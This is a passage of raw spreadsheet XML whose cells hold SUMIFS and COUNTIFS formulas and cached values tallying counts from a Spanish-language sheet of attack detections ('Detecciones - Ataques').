        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>566</v>
      </c>
      <c r="BN53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>2</v>
      </c>
      <c r="BO53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>0</v>
      </c>
      <c r="BZ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>0</v>
      </c>
      <c r="CI53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>2</v>
      </c>
      <c r="CP53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>1</v>
      </c>
      <c r="CQ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>5</v>
      </c>
      <c r="DF53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ53" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK53" s="271"/>
      <c r="DO53" s="279"/>
      <c r="DP53" s="271"/>
      <c r="DQ53" s="271"/>
      <c r="DR53" s="271"/>
      <c r="DS53" s="271"/>
      <c r="DT53" s="271"/>
      <c r="DU53" s="271"/>
      <c r="DV53" s="271"/>
      <c r="DW53" s="271"/>
      <c r="DX53" s="271"/>
      <c r="DY53" s="271"/>
      <c r="DZ53" s="271"/>
      <c r="EA53" s="271"/>
      <c r="EB53" s="271"/>
      <c r="EC53" s="271"/>
      <c r="ED53" s="280"/>
      <c r="EG53" s="279"/>
      <c r="EH53" s="271"/>
      <c r="EI53" s="358" t="s">
        <v>1725</v>
      </c>
      <c r="EJ53" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK53" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EL53" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EM53" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EN53" s="360">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="EO53" s="364"/>
      <c r="EP53" s="456">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="EQ53" s="457">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="ER53" s="427">
        <f t="shared" si="42"/>
        <v>1</v>
      </c>
      <c r="ES53" s="427">
        <f t="shared" si="43"/>
        <v>1</v>
      </c>
      <c r="ET53" s="467" t="s">
        <v>12</v>
      </c>
      <c r="EU53" s="271"/>
      <c r="EV53" s="358" t="s">
        <v>633</v>
      </c>
      <c r="EW53" s="465">
        <f t="shared" ref="EW53:EZ53" si="46">IF(EJ31=0,"-",EJ52/EJ31)</f>
        <v>0</v>
      </c>
      <c r="EX53" s="465">
        <f t="shared" si="46"/>
        <v>0.5384615385</v>
      </c>
      <c r="EY53" s="465">
        <f t="shared" si="46"/>
        <v>0.4761904762</v>
      </c>
      <c r="EZ53" s="466">
        <f t="shared" si="46"/>
        <v>0.2857142857</v>
      </c>
      <c r="FA53" s="280"/>
      <c r="FK53" s="445"/>
      <c r="FL53" s="359"/>
      <c r="FM53" s="359"/>
      <c r="FN53" s="359"/>
      <c r="FO53" s="359"/>
      <c r="FP53" s="359"/>
      <c r="FY53" s="379" t="s">
        <v>244</v>
      </c>
      <c r="FZ53" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA53" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GC53" s="379" t="s">
        <v>244</v>
      </c>
      <c r="GD53" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GE53" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*"))</f>
        <v>0</v>
      </c>
    </row>
    <row r="54">
      <c r="B54" s="468"/>
      <c r="C54" s="469"/>
      <c r="D54" s="469"/>
      <c r="E54" s="469"/>
      <c r="F54" s="469"/>
      <c r="G54" s="470"/>
      <c r="J54" s="277"/>
      <c r="K54" s="352" t="s">
        <v>2526</v>
      </c>
      <c r="L54" s="403" t="s">
        <v>2527</v>
      </c>
      <c r="M54" s="403" t="s">
        <v>2528</v>
      </c>
      <c r="N54" s="404" t="s">
        <v>2529</v>
      </c>
      <c r="O54" s="278"/>
      <c r="Q54" s="271"/>
      <c r="R54" s="352" t="s">
        <v>2513</v>
      </c>
      <c r="S54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="T54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>108</v>
      </c>
      <c r="V54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="W54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="Y54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Z54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>571</v>
      </c>
      <c r="AA54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>334</v>
      </c>
      <c r="AB54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AC54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="AD54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE54" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AF54" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EK3:$EK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG54" s="271"/>
      <c r="AH54" s="352" t="s">
        <v>2513</v>
      </c>
      <c r="AI54" s="355">
